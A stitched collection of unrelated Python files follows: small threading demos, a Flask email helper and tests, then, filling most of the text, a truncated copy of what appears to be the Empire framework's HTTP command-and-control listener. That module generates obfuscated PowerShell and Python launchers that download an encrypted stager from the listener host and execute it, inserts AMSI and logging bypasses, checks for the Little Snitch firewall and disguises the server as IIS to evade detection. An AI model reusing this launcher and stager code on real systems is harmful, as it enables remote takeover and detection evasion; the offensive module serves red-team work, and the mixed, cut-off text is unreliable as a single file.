source | python
|---|---|
threading_daemon_join.py
|
#!/usr/bin/env python3
# encoding: utf-8
#
# Copyright (c) 2008 Doug Hellmann All rights reserved.
#
"""Joining daemon threads to prevent premature exit.
"""
#end_pymotw_header
import threading
import time
import logging
def daemon():
logging.debug('Starting')
time.sleep(0.2)
logging.debug('Exiting')
def non_daemon():
logging.debug('Starting')
logging.debug('Exiting')
logging.basicConfig(
level=logging.DEBUG,
format='(%(threadName)-10s) %(message)s',
)
d = threading.Thread(name='daemon', target=daemon, daemon=True)
t = threading.Thread(name='non-daemon', target=non_daemon)
d.start()
t.start()
d.join()
t.join()
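# Note: without the d.join() call above, the interpreter would exit as soon as
# the non-daemon thread finished, killing the daemon thread during its 0.2 s
# sleep, so its "Exiting" message would never be printed. Joining the daemon
# thread explicitly waits for it to complete before shutdown.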
|
email.py
|
from threading import Thread
from flask import current_app, render_template
from flask_mail import Message
import os
from . import mail
def send_async_email(app, msg):
with app.app_context():
mail.send(msg)
def send_email(to, subject, template, **kwargs):
app = current_app._get_current_object()
msg = Message(app.config['FLASKY_MAIL_SUBJECT_PREFIX'] + ' ' + subject,
sender=app.config['FLASKY_MAIL_SENDER'], recipients=[to])
msg.body = render_template(template + '.txt', **kwargs)
msg.html = render_template(template + '.html', **kwargs)
thr = Thread(target=send_async_email, args=[app, msg])
thr.start()
return thr
def email_me(name, subject, email, message):
msg = Message(subject, sender=email, recipients=[ os.environ.get('FLASKY_ADMIN')])
msg.body = """
From: %s @ %s;
%s
""" % (name, email, message)
mail.send(msg)
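# Usage sketch (illustrative only; the template name and variables below are
# hypothetical). send_email() must be called inside an application/request
# context so that current_app resolves; the worker thread then re-enters the
# context via app.app_context() before calling mail.send():
#
#     thr = send_email(user.email, 'Confirm Your Account',
#                      'auth/email/confirm', user=user, token=token)
#     thr.join()  # optional: block only if the caller must wait for delivery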
|
test_server_basic.py
|
import subprocess
import requests
import time
import re
import signal
import os
import traceback
from threading import Thread
from time import sleep
__this_dir__ = os.path.join(os.path.abspath(os.path.dirname(__file__)))
class DispatcherServer(object):
def __init__(self):
self.url = None
def follow_output(self):
url=None
for line in iter(self.process.stdout.readline, b''):
line = line.decode(errors="replace")
print("following server:", line.rstrip())
m = re.search(r"Running on (.*?) \(Press CTRL\+C to quit\)", line)
if m:
url = m.group(1)  # alternatively get from config/env
print("found url:", url)
if re.search(r"\* Debugger PIN:.*?", line):
print("server ready")
url = url.replace("0.0.0.0", "127.0.0.1")
self.url = url
def start(self):
cmd=["python",__this_dir__+"/../bin/run_osa_cdci_server.py"]
print("command:"," ".join(cmd))
# start the server in its own session/process group so stop() can killpg() only the server
self.process=subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, shell=False, start_new_session=True)
print("\n\nfollowing server startup")
thread = Thread(target = self.follow_output, args = ())
thread.start()
while self.url is None:
time.sleep(0.1)
time.sleep(0.5)
self.url="http://127.0.0.1:5000"
return self
def stop(self):
os.killpg(os.getpgid(self.process.pid), signal.SIGTERM)
def __enter__(self):
return self.start()
def __exit__(self, _type, value, tracebac):
print("exiting:",_type,value, tracebac)
traceback.print_tb(tracebac)
time.sleep(0.5)
self.stop()
def test_urltest():
with DispatcherServer() as server:
print(server)
c=requests.get(server.url+"/test",params=dict(
image_type="Real",
product_type="image",
E1=20.,
E2=40.,
T1="2008-01-01T11:11:11.0",
T2="2008-06-01T11:11:11.0",
))
jdata=c.json()
print('done')
print(jdata.keys())
print(jdata['data'])
test_urltest()
|
test_gateway.py
|
import functools
import time
from threading import Thread
import numpy as np
import pytest
from jina import Document, Client, Flow
from jina.enums import CompressAlgo
from tests import random_docs
@pytest.mark.slow
@pytest.mark.parametrize('compress_algo', list(CompressAlgo))
def test_compression(compress_algo, mocker):
response_mock = mocker.Mock()
f = Flow(compress=str(compress_algo)).add().add(name='DummyEncoder', shards=2).add()
with f:
f.index(random_docs(10), on_done=response_mock)
response_mock.assert_called()
@pytest.mark.slow
@pytest.mark.parametrize('protocol', ['websocket', 'grpc', 'http'])
def test_gateway_concurrency(protocol):
PORT_EXPOSE = 12345
CONCURRENCY = 2
threads = []
status_codes = [None] * CONCURRENCY
durations = [None] * CONCURRENCY
def _validate(req, start, status_codes, durations, index):
end = time.time()
durations[index] = end - start
status_codes[index] = req.status.code
def _request(status_codes, durations, index):
start = time.time()
Client(port=PORT_EXPOSE, protocol=protocol).index(
inputs=(Document() for _ in range(256)),
on_done=functools.partial(
_validate,
start=start,
status_codes=status_codes,
durations=durations,
index=index,
),
batch_size=16,
)
f = Flow(protocol=protocol, port_expose=PORT_EXPOSE).add(parallel=2)
with f:
threads = []
status_codes = [None] * CONCURRENCY
durations = [None] * CONCURRENCY
for i in range(CONCURRENCY):
t = Thread(target=_request, args=(status_codes, durations, i))
threads.append(t)
t.start()
for t in threads:
t.join()
success = status_codes.count(0)
failed = len(status_codes) - success
print(
f'clients: {len(durations)}\n'
f'min roundtrip time: {np.min(durations)}\n'
f'max roundtrip time: {np.max(durations)}\n'
f'mean roundtrip time: {np.mean(durations)}\n'
)
assert success >= 1
# In some slow environments, a certain degree of failed
# requests will occur. Here we limit the degree of failed
# requests.
rate = failed / success
assert rate < 0.1
|
directory_monitor.py
|
import threading
from typing import Dict
import os
import time
class DirectoryMonitor():
def __init__(self, *, directory_path: str, include_subdirectories: bool, delay_between_checks_seconds: float):
self.__directory_path = directory_path
self.__include_subdirectories = include_subdirectories
self.__delay_between_checks_seconds = delay_between_checks_seconds
self.__monitor_thread = None # type: threading.Thread
self.__monitor_thread_semaphore = threading.Semaphore()
self.__is_monitor_thread_running = False
self.__wait_semaphore = threading.Semaphore()
def start(self):
self.__monitor_thread_semaphore.acquire()
if self.__is_monitor_thread_running:
self.__monitor_thread_semaphore.release()
raise Exception("Cannot start monitoring: the monitor thread is already running.")
else:
self.__is_monitor_thread_running = True
self.__monitor_thread = threading.Thread(target=self.__monitor_thread_method)
self.__wait_semaphore.acquire()
self.__monitor_thread.start()
self.__monitor_thread_semaphore.release()
def wait(self):
self.__wait_semaphore.acquire()
self.__wait_semaphore.release()
def __monitor_thread_method(self):
_previous_file_sizes_per_file_path = {} # type: Dict[str, int]
while self.__is_monitor_thread_running:
_is_new_file_discovered = False
_is_existing_file_size_different = False
_is_file_missing = False
if self.__directory_path not in _previous_file_sizes_per_file_path.keys():
_is_new_file_discovered = True
_current_file_sizes_per_file_path = {
self.__directory_path: None
} # type: Dict[str, int]
_pending_directories = [
self.__directory_path
]
while len(_pending_directories) != 0:
_directory_path = _pending_directories.pop(0)
for _file_name in os.listdir(_directory_path):
_file_path = os.path.join(_directory_path, _file_name)
if os.path.isdir(_file_path):
_is_file = False
_file_size = None
else:
_is_file = True
_file_size = os.stat(_file_path).st_size
if _file_path not in _previous_file_sizes_per_file_path.keys():
_is_new_file_discovered = True
elif _is_file and _previous_file_sizes_per_file_path[_file_path] != _file_size:
_is_existing_file_size_different = True
_current_file_sizes_per_file_path[_file_path] = _file_size
if not _is_file and self.__include_subdirectories:
_pending_directories.append(_file_path)
for _file_path in _previous_file_sizes_per_file_path:
if _file_path not in _current_file_sizes_per_file_path.keys():
_is_file_missing = True
break
if _is_new_file_discovered or _is_existing_file_size_different or _is_file_missing:
_previous_file_sizes_per_file_path = _current_file_sizes_per_file_path
_current_file_sizes_per_file_path = None
time.sleep(self.__delay_between_checks_seconds)
else:
self.__wait_semaphore.release()
self.__is_monitor_thread_running = False
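# Usage sketch (illustrative only; the path and interval are examples).
# start() launches the background polling thread; wait() blocks until a full
# polling pass finds no files added, removed, or resized since the previous pass:
#
#     monitor = DirectoryMonitor(
#         directory_path="/tmp/incoming",
#         include_subdirectories=True,
#         delay_between_checks_seconds=1.0,
#     )
#     monitor.start()
#     monitor.wait()  # returns once the directory contents have stabilized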
|
http.py
|
from __future__ import print_function
import base64
import copy
import json
import logging
import os
import random
import ssl
import string
import sys
import threading
import time
from builtins import object
from builtins import str
from flask import Flask, request, make_response, send_from_directory
from pydispatch import dispatcher
from lib.common import bypasses
from lib.common import encryption
# Empire imports
from lib.common import helpers
from lib.common import obfuscation
from lib.common import packets
from lib.common import templating
class Listener(object):
def __init__(self, mainMenu, params=[]):
self.info = {
'Name': 'HTTP[S]',
'Author': ['@harmj0y'],
'Description': ('Starts an HTTP[S] listener (PowerShell or Python) that uses a GET/POST approach.'),
'Category': ('client_server'),
'Comments': []
}
# any options needed by the stager, settable during runtime
self.options = {
# format:
# value_name : {description, required, default_value}
'Name': {
'Description': 'Name for the listener.',
'Required': True,
'Value': 'http'
},
'Host': {
'Description': 'Hostname/IP for staging.',
'Required': True,
'Value': "http://%s" % (helpers.lhost())
},
'BindIP': {
'Description': 'The IP to bind to on the control server.',
'Required': True,
'Value': '0.0.0.0'
},
'Port': {
'Description': 'Port for the listener.',
'Required': True,
'Value': ''
},
'Launcher': {
'Description': 'Launcher string.',
'Required': True,
'Value': 'powershell -noP -sta -w 1 -enc '
},
'StagingKey': {
'Description': 'Staging key for initial agent negotiation.',
'Required': True,
'Value': '2c103f2c4ed1e59c0b4e2e01821770fa'
},
'DefaultDelay': {
'Description': 'Agent delay/reach back interval (in seconds).',
'Required': True,
'Value': 5
},
'DefaultJitter': {
'Description': 'Jitter in agent reachback interval (0.0-1.0).',
'Required': True,
'Value': 0.0
},
'DefaultLostLimit': {
'Description': 'Number of missed checkins before exiting',
'Required': True,
'Value': 60
},
'DefaultProfile': {
'Description': 'Default communication profile for the agent.',
'Required': True,
'Value': "/admin/get.php,/news.php,/login/process.php|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
},
'CertPath': {
'Description': 'Certificate path for https listeners.',
'Required': False,
'Value': ''
},
'KillDate': {
'Description': 'Date for the listener to exit (MM/dd/yyyy).',
'Required': False,
'Value': ''
},
'WorkingHours': {
'Description': 'Hours for the agent to operate (09:00-17:00).',
'Required': False,
'Value': ''
},
'Headers': {
'Description': 'Headers for the control server.',
'Required': True,
'Value': 'Server:Microsoft-IIS/7.5'
},
'Cookie': {
'Description': 'Custom Cookie Name',
'Required': False,
'Value': ''
},
'StagerURI': {
'Description': 'URI for the stager. Must use /download/. Example: /download/stager.php',
'Required': False,
'Value': ''
},
'UserAgent': {
'Description': 'User-agent string to use for the staging request (default, none, or other).',
'Required': False,
'Value': 'default'
},
'Proxy': {
'Description': 'Proxy to use for request (default, none, or other).',
'Required': False,
'Value': 'default'
},
'ProxyCreds': {
'Description': 'Proxy credentials ([domain\]username:password) to use for request (default, none, or other).',
'Required': False,
'Value': 'default'
},
'SlackToken': {
'Description': 'Your SlackBot API token to communicate with your Slack instance.',
'Required': False,
'Value': ''
},
'SlackChannel': {
'Description': 'The Slack channel or DM that notifications will be sent to.',
'Required': False,
'Value': '#general'
}
}
# required:
self.mainMenu = mainMenu
self.threads = {}
# optional/specific for this module
self.app = None
self.uris = [a.strip('/') for a in self.options['DefaultProfile']['Value'].split('|')[0].split(',')]
# set the default staging key to the controller db default
self.options['StagingKey']['Value'] = str(helpers.get_config('staging_key')[0])
# randomize the length of the default_response and index_page headers to evade signature based scans
self.header_offset = random.randint(0, 64)
# used to protect self.http and self.mainMenu.conn during threaded listener access
self.lock = threading.Lock()
self.session_cookie = ''
# if the current session cookie is empty, generate a random cookie name
if self.session_cookie == '':
self.options['Cookie']['Value'] = self.generate_cookie()
# this might not be necessary. It could probably be achieved by just calling mainmenu.get_db, but all the other files
# have implemented it in place. It might be worthwhile to just make a database handling file.
def get_db_connection(self):
"""
Returns the connection for the SQLite DB.
"""
self.lock.acquire()
self.mainMenu.conn.row_factory = None
self.lock.release()
return self.mainMenu.conn
def default_response(self):
"""
Returns an IIS 7.5 404 not found page.
"""
return '\n'.join([
'<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">',
'<html xmlns="http://www.w3.org/1999/xhtml">',
'<head>',
'<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>',
'<title>404 - File or directory not found.</title>',
'<style type="text/css">',
'<!--',
'body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}',
'fieldset{padding:0 15px 10px 15px;}',
'h1{font-size:2.4em;margin:0;color:#FFF;}',
'h2{font-size:1.7em;margin:0;color:#CC0000;}',
'h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;}',
'#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;',
'background-color:#555555;}',
'#content{margin:0 0 0 2%;position:relative;}',
'.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}',
'-->',
'</style>',
'</head>',
'<body>',
'<div id="header"><h1>Server Error</h1></div>',
'<div id="content">',
' <div class="content-container"><fieldset>',
' <h2>404 - File or directory not found.</h2>',
' <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3>',
' </fieldset></div>',
'</div>',
'</body>',
'</html>',
' ' * self.header_offset, # randomize the length of the header to evade signature based detection
])
def index_page(self):
"""
Returns a default HTTP server page.
"""
return '\n'.join([
'<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">',
'<html xmlns="http://www.w3.org/1999/xhtml">',
'<head>',
'<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />',
'<title>IIS7</title>',
'<style type="text/css">',
'<!--',
'body {',
' color:#000000;',
' background-color:#B3B3B3;',
' margin:0;',
'}',
'',
'#container {',
' margin-left:auto;',
' margin-right:auto;',
' text-align:center;',
' }',
'',
'a img {',
' border:none;',
'}',
'',
'-->',
'</style>',
'</head>',
'<body>',
'<div id="container">',
'<a href="http://go.microsoft.com/fwlink/?linkid=66138&clcid=0x409"><img src="welcome.png" alt="IIS7" width="571" height="411" /></a>',
'</div>',
'</body>',
'</html>',
])
def validate_options(self):
"""
Validate all options for this listener.
"""
self.uris = [a.strip('/') for a in self.options['DefaultProfile']['Value'].split('|')[0].split(',')]
for key in self.options:
if self.options[key]['Required'] and (str(self.options[key]['Value']).strip() == ''):
print(helpers.color("[!] Option \"%s\" is required." % (key)))
return False
# If we've selected an HTTPS listener without specifying CertPath, let us know.
if self.options['Host']['Value'].startswith('https') and self.options['CertPath']['Value'] == '':
print(helpers.color("[!] HTTPS selected but no CertPath specified."))
return False
return True
def generate_launcher(self, encode=True, obfuscate=False, obfuscationCommand="", userAgent='default',
proxy='default', proxyCreds='default', stagerRetries='0', language=None, safeChecks='',
listenerName=None, scriptLogBypass=True, AMSIBypass=True, AMSIBypass2=False):
"""
Generate a basic launcher for the specified listener.
"""
if not language:
print(helpers.color('[!] listeners/http generate_launcher(): no language specified!'))
if listenerName and (listenerName in self.threads) and (
listenerName in self.mainMenu.listeners.activeListeners):
# extract the set options for this instantiated listener
listenerOptions = self.mainMenu.listeners.activeListeners[listenerName]['options']
host = listenerOptions['Host']['Value']
launcher = listenerOptions['Launcher']['Value']
stagingKey = listenerOptions['StagingKey']['Value']
profile = listenerOptions['DefaultProfile']['Value']
uris = [a for a in profile.split('|')[0].split(',')]
stage0 = random.choice(uris)
customHeaders = profile.split('|')[2:]
cookie = listenerOptions['Cookie']['Value']
# generate a new cookie if the current session cookie is empty, to avoid an empty cookie when creating multiple listeners
if cookie == '':
generate = self.generate_cookie()
listenerOptions['Cookie']['Value'] = generate
cookie = generate
if language.startswith('po'):
# PowerShell
stager = '$ErrorActionPreference = \"SilentlyContinue\";'
if safeChecks.lower() == 'true':
stager = helpers.randomize_capitalization("If($PSVersionTable.PSVersion.Major -ge 3){")
# ScriptBlock Logging bypass
if scriptLogBypass:
stager += bypasses.scriptBlockLogBypass()
# @mattifestation's AMSI bypass
if AMSIBypass:
stager += bypasses.AMSIBypass()
# rastamouse AMSI bypass
if AMSIBypass2:
stager += bypasses.AMSIBypass2()
if safeChecks.lower() == 'true':
stager += "};"
stager += helpers.randomize_capitalization("[System.Net.ServicePointManager]::Expect100Continue=0;")
stager += helpers.randomize_capitalization(
"$" + helpers.generate_random_script_var_name("wc") + "=New-Object System.Net.WebClient;")
if userAgent.lower() == 'default':
profile = listenerOptions['DefaultProfile']['Value']
userAgent = profile.split('|')[1]
stager += "$u='" + userAgent + "';"
if 'https' in host:
# allow for self-signed certificates for https connections
stager += "[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};"
stager += "$ser=" + helpers.obfuscate_call_home_address(host) + ";$t='" + stage0 + "';"
if userAgent.lower() != 'none':
stager += helpers.randomize_capitalization(
"$" + helpers.generate_random_script_var_name("wc") + '.Headers.Add(')
stager += "'User-Agent',$u);"
if proxy.lower() != 'none':
if proxy.lower() == 'default':
stager += helpers.randomize_capitalization("$" + helpers.generate_random_script_var_name(
"wc") + ".Proxy=[System.Net.WebRequest]::DefaultWebProxy;")
else:
# TODO: implement form for other proxy
stager += helpers.randomize_capitalization("$proxy=New-Object Net.WebProxy('")
stager += proxy.lower()
stager += helpers.randomize_capitalization("');")
stager += helpers.randomize_capitalization(
"$" + helpers.generate_random_script_var_name("wc") + ".Proxy = $proxy;")
if proxyCreds.lower() != 'none':
if proxyCreds.lower() == "default":
stager += helpers.randomize_capitalization(
"$" + helpers.generate_random_script_var_name(
"wc") + ".Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials;")
else:
# TODO: implement form for other proxy credentials
username = proxyCreds.split(':')[0]
password = proxyCreds.split(':')[1]
if len(username.split('\\')) > 1:
usr = username.split('\\')[1]
domain = username.split('\\')[0]
stager += "$netcred = New-Object System.Net.NetworkCredential('" + usr + "','" + password + "','" + domain + "');"
else:
usr = username.split('\\')[0]
stager += "$netcred = New-Object System.Net.NetworkCredential('" + usr + "','" + password + "');"
stager += helpers.randomize_capitalization(
"$" + helpers.generate_random_script_var_name(
"wc") + ".Proxy.Credentials = $netcred;")
# save the proxy settings to use during the entire staging process and the agent
stager += "$Script:Proxy = $" + helpers.generate_random_script_var_name("wc") + ".Proxy;"
# TODO: reimplement stager retries?
# check if we're using IPv6
listenerOptions = copy.deepcopy(listenerOptions)
bindIP = listenerOptions['BindIP']['Value']
port = listenerOptions['Port']['Value']
if ':' in bindIP:
if "http" in host:
if "https" in host:
host = 'https://' + '[' + str(bindIP) + ']' + ":" + str(port)
else:
host = 'http://' + '[' + str(bindIP) + ']' + ":" + str(port)
# code to turn the key string into a byte array
stager += helpers.randomize_capitalization("$K=[System.Text.Encoding]::ASCII.GetBytes(")
stager += "'%s');" % (stagingKey)
# this is the minimized RC4 stager code from rc4.ps1
stager += helpers.randomize_capitalization(
'$R={$D,$K=$Args;$S=0..255;0..255|%{$J=($J+$S[$_]+$K[$_%$K.Count])%256;$S[$_],$S[$J]=$S[$J],$S[$_]};$D|%{$I=($I+1)%256;$H=($H+$S[$I])%256;$S[$I],$S[$H]=$S[$H],$S[$I];$_-bxor$S[($S[$I]+$S[$H])%256]}};')
# prebuild the request routing packet for the launcher
routingPacket = packets.build_routing_packet(stagingKey, sessionID='00000000', language='POWERSHELL',
meta='STAGE0', additional='None', encData='')
b64RoutingPacket = base64.b64encode(routingPacket)
# Add custom headers if any
if customHeaders != []:
for header in customHeaders:
headerKey = header.split(':')[0]
headerValue = header.split(':')[1]
# If host header defined, assume domain fronting is in use and add a call to the base URL first
# this is a trick to keep the true host name from showing in the TLS SNI portion of the client hello
if headerKey.lower() == "host":
stager += helpers.randomize_capitalization(
"try{$ig=$" + helpers.generate_random_script_var_name(
"wc") + ".DownloadData($ser)}catch{};")
stager += helpers.randomize_capitalization(
"$" + helpers.generate_random_script_var_name("wc") + ".Headers.Add(")
stager += "\"%s\",\"%s\");" % (headerKey, headerValue)
# add the RC4 packet to a cookie
stager += helpers.randomize_capitalization(
"$" + helpers.generate_random_script_var_name("wc") + ".Headers.Add(")
stager += "\"Cookie\",\"%s=%s\");" % (cookie, b64RoutingPacket.decode('UTF-8'))
stager += helpers.randomize_capitalization(
"$data=$" + helpers.generate_random_script_var_name("wc") + ".DownloadData($ser+$t);")
stager += helpers.randomize_capitalization("$iv=$data[0..3];$data=$data[4..$data.length];")
# decode everything and kick it over to IEX to kick off execution
stager += helpers.randomize_capitalization("-join[Char[]](& $R $data ($IV+$K))|IEX")
if obfuscate:
stager = helpers.obfuscate(self.mainMenu.installPath, stager, obfuscationCommand=obfuscationCommand)
# base64 encode the stager and return it
if encode and ((not obfuscate) or ("launcher" not in obfuscationCommand.lower())):
return helpers.powershell_launcher(stager, launcher)
else:
# otherwise return the case-randomized stager
return stager
if language.startswith('py'):
# Python
launcherBase = 'import sys;'
if "https" in host:
# monkey patch ssl woohooo
launcherBase += "import ssl;\nif hasattr(ssl, '_create_unverified_context'):ssl._create_default_https_context = ssl._create_unverified_context;\n"
try:
if safeChecks.lower() == 'true':
launcherBase += "import re, subprocess;"
launcherBase += "cmd = \"ps -ef | grep Little\ Snitch | grep -v grep\"\n"
launcherBase += "ps = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n"
launcherBase += "out, err = ps.communicate()\n"
launcherBase += "if re.search(\"Little Snitch\", out.decode('UTF-8')):\n"
launcherBase += " sys.exit()\n"
except Exception as e:
p = "[!] Error setting LittleSnitch in stager: " + str(e)
print(helpers.color(p, color='red'))
if userAgent.lower() == 'default':
profile = listenerOptions['DefaultProfile']['Value']
userAgent = profile.split('|')[1]
launcherBase += "import urllib.request as urllib;\n"
launcherBase += "UA='%s';" % (userAgent)
launcherBase += "server='%s';t='%s';" % (host, stage0)
# prebuild the request routing packet for the launcher
routingPacket = packets.build_routing_packet(stagingKey, sessionID='00000000', language='PYTHON',
meta='STAGE0', additional='None', encData='')
b64RoutingPacket = base64.b64encode(routingPacket).decode('UTF-8')
launcherBase += "req=urllib.Request(server+t);\n"
# Add custom headers if any
if customHeaders != []:
for header in customHeaders:
headerKey = header.split(':')[0]
headerValue = header.split(':')[1]
# launcherBase += ",\"%s\":\"%s\"" % (headerKey, headerValue)
launcherBase += "req.add_header(\"%s\",\"%s\");\n" % (headerKey, headerValue)
if proxy.lower() != "none":
if proxy.lower() == "default":
launcherBase += "proxy = urllib.ProxyHandler();\n"
else:
proto = proxy.split(':')[0]
launcherBase += "proxy = urllib.ProxyHandler({'" + proto + "':'" + proxy + "'});\n"
if proxyCreds != "none":
if proxyCreds == "default":
launcherBase += "o = urllib.build_opener(proxy);\n"
# add the RC4 packet to a cookie
launcherBase += "o.addheaders=[('User-Agent',UA), (\"Cookie\", \"session=%s\")];\n" % (
b64RoutingPacket)
else:
launcherBase += "proxy_auth_handler = urllib.ProxyBasicAuthHandler();\n"
username = proxyCreds.split(':')[0]
password = proxyCreds.split(':')[1]
launcherBase += "proxy_auth_handler.add_password(None,'" + proxy + "','" + username + "','" + password + "');\n"
launcherBase += "o = urllib.build_opener(proxy, proxy_auth_handler);\n"
# add the RC4 packet to a cookie
launcherBase += "o.addheaders=[('User-Agent',UA), (\"Cookie\", \"session=%s\")];\n" % (
b64RoutingPacket)
else:
launcherBase += "o = urllib.build_opener(proxy);\n"
else:
launcherBase += "o = urllib.build_opener();\n"
# install proxy and creds globally, so they can be used with urlopen.
launcherBase += "urllib.install_opener(o);\n"
# download the stager and extract the IV
launcherBase += "a=urllib.urlopen(req).read();\n"
launcherBase += "IV=a[0:4];"
launcherBase += "data=a[4:];"
launcherBase += "key=IV+'%s'.encode('UTF-8');" % (stagingKey)
# RC4 decryption
launcherBase += "S,j,out=list(range(256)),0,[]\n"
launcherBase += "for i in list(range(256)):\n"
launcherBase += " j=(j+S[i]+key[i%len(key)])%256\n"
launcherBase += " S[i],S[j]=S[j],S[i]\n"
launcherBase += "i=j=0\n"
launcherBase += "for char in data:\n"
launcherBase += " i=(i+1)%256\n"
launcherBase += " j=(j+S[i])%256\n"
launcherBase += " S[i],S[j]=S[j],S[i]\n"
launcherBase += " out.append(chr(char^S[(S[i]+S[j])%256]))\n"
launcherBase += "exec(''.join(out))"
if encode:
launchEncoded = base64.b64encode(launcherBase.encode('UTF-8')).decode('UTF-8')
if isinstance(launchEncoded, bytes):
launchEncoded = launchEncoded.decode('UTF-8')
launcher = "echo \"import sys,base64,warnings;warnings.filterwarnings(\'ignore\');exec(base64.b64decode('%s'));\" | python3 &" % (
launchEncoded)
return launcher
else:
return launcherBase
else:
print(helpers.color(
"[!] listeners/http generate_launcher(): invalid language specification: only 'powershell' and 'python' are currently supported for this module."))
else:
print(helpers.color("[!] listeners/http generate_launcher(): invalid listener name specification!"))
def generate_stager(self, listenerOptions, encode=False, encrypt=True, obfuscate=False, obfuscationCommand="",
language=None):
"""
Generate the stager code needed for communications with this listener.
"""
if not language:
print(helpers.color('[!] listeners/http generate_stager(): no language specified!'))
return None
profile = listenerOptions['DefaultProfile']['Value']
uris = [a.strip('/') for a in profile.split('|')[0].split(',')]
launcher = listenerOptions['Launcher']['Value']
stagingKey = listenerOptions['StagingKey']['Value']
workingHours = listenerOptions['WorkingHours']['Value']
killDate = listenerOptions['KillDate']['Value']
host = listenerOptions['Host']['Value']
customHeaders = profile.split('|')[2:]
# select some random URIs for staging from the main profile
stage1 = random.choice(uris)
stage2 = random.choice(uris)
if language.lower() == 'powershell':
# read in the stager base
f = open("%s/data/agent/stagers/http.ps1" % (self.mainMenu.installPath))
stager = f.read()
f.close()
# Get the random function name generated at install and patch the stager with the proper function name
conn = self.get_db_connection()
self.lock.acquire()
stager = helpers.keyword_obfuscation(stager)
self.lock.release()
# make sure the server ends with "/"
if not host.endswith("/"):
host += "/"
# Patch in custom Headers
remove = []
if customHeaders != []:
for key in customHeaders:
value = key.split(":")
if 'cookie' in value[0].lower() and value[1]:
continue
remove += value
headers = ','.join(remove)
# headers = ','.join(customHeaders)
stager = stager.replace("$customHeaders = \"\";", "$customHeaders = \"" + headers + "\";")
# patch in working hours, if any
if workingHours != "":
stager = stager.replace('WORKING_HOURS_REPLACE', workingHours)
# Patch in the killdate, if any
if killDate != "":
stager = stager.replace('REPLACE_KILLDATE', killDate)
# patch the server and key information
stager = stager.replace('REPLACE_SERVER', host)
stager = stager.replace('REPLACE_STAGING_KEY', stagingKey)
stager = stager.replace('index.jsp', stage1)
stager = stager.replace('index.php', stage2)
randomizedStager = ''
# forces inputs into a bytestring to ensure 2/3 compatibility
stagingKey = stagingKey.encode('UTF-8')
#stager = stager.encode('UTF-8')
#randomizedStager = randomizedStager.encode('UTF-8')
for line in stager.split("\n"):
line = line.strip()
# skip commented line
if not line.startswith("#"):
# randomize capitalization of lines without quoted strings
if "\"" not in line:
randomizedStager += helpers.randomize_capitalization(line)
else:
randomizedStager += line
if obfuscate:
randomizedStager = helpers.obfuscate(self.mainMenu.installPath, randomizedStager,
obfuscationCommand=obfuscationCommand)
# base64 encode the stager and return it
# There doesn't seem to be any conditions in which the encrypt flag isn't set so the other
# if/else statements are irrelevant
if encode:
return helpers.enc_powershell(randomizedStager)
elif encrypt:
RC4IV = os.urandom(4)
return RC4IV + encryption.rc4(RC4IV + stagingKey, randomizedStager.encode('UTF-8'))
else:
# otherwise just return the case-randomized stager
return randomizedStager
elif language.lower() == 'python':
template_path = [
os.path.join(self.mainMenu.installPath, '/data/agent/stagers'),
os.path.join(self.mainMenu.installPath, './data/agent/stagers')]
eng = templating.TemplateEngine(template_path)
template = eng.get_template('http.py')
template_options = {
'working_hours': workingHours,
'kill_date': killDate,
'staging_key': stagingKey,
'profile': profile,
'stage_1': stage1,
'stage_2': stage2
}
stager = template.render(template_options)
stager = obfuscation.py_minify(stager)
# base64 encode the stager and return it
if encode:
return base64.b64encode(stager)
if encrypt:
# return an encrypted version of the stager ("normal" staging)
RC4IV = os.urandom(4)
return RC4IV + encryption.rc4(RC4IV + stagingKey.encode('UTF-8'), stager.encode('UTF-8'))
else:
# otherwise return the standard stager
return stager
else:
print(helpers.color(
"[!] listeners/http generate_stager(): invalid language specification, only 'powershell' and 'python' are currently supported for this module."))
def generate_agent(self, listenerOptions, language=None, obfuscate=False, obfuscationCommand=""):
"""
Generate the full agent code needed for communications with this listener.
"""
if not language:
print(helpers.color('[!] listeners/http generate_agent(): no language specified!'))
return None
language = language.lower()
delay = listenerOptions['DefaultDelay']['Value']
jitter = listenerOptions['DefaultJitter']['Value']
profile = listenerOptions['DefaultProfile']['Value']
lostLimit = listenerOptions['DefaultLostLimit']['Value']
killDate = listenerOptions['KillDate']['Value']
workingHours = listenerOptions['WorkingHours']['Value']
b64DefaultResponse = base64.b64encode(self.default_response().encode('UTF-8'))
if language == 'powershell':
f = open(self.mainMenu.installPath + "./data/agent/agent.ps1")
code = f.read()
f.close()
# Get the random function name generated at install and patch the stager with the proper function name
conn = self.get_db_connection()
self.lock.acquire()
code = helpers.keyword_obfuscation(code)
self.lock.release()
# patch in the comms methods
commsCode = self.generate_comms(listenerOptions=listenerOptions, language=language)
code = code.replace('REPLACE_COMMS', commsCode)
# strip out comments and blank lines
code = helpers.strip_powershell_comments(code)
# patch in the delay, jitter, lost limit, and comms profile
code = code.replace('$AgentDelay = 60', "$AgentDelay = " + str(delay))
code = code.replace('$AgentJitter = 0', "$AgentJitter = " + str(jitter))
code = code.replace(
'$Profile = "/admin/get.php,/news.php,/login/process.php|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"',
"$Profile = \"" + str(profile) + "\"")
code = code.replace('$LostLimit = 60', "$LostLimit = " + str(lostLimit))
code = code.replace('$DefaultResponse = ""', '$DefaultResponse = "' + b64DefaultResponse.decode('UTF-8') + '"')
# patch in the killDate and workingHours if they're specified
if killDate != "":
code = code.replace('$KillDate,', "$KillDate = '" + str(killDate) + "',")
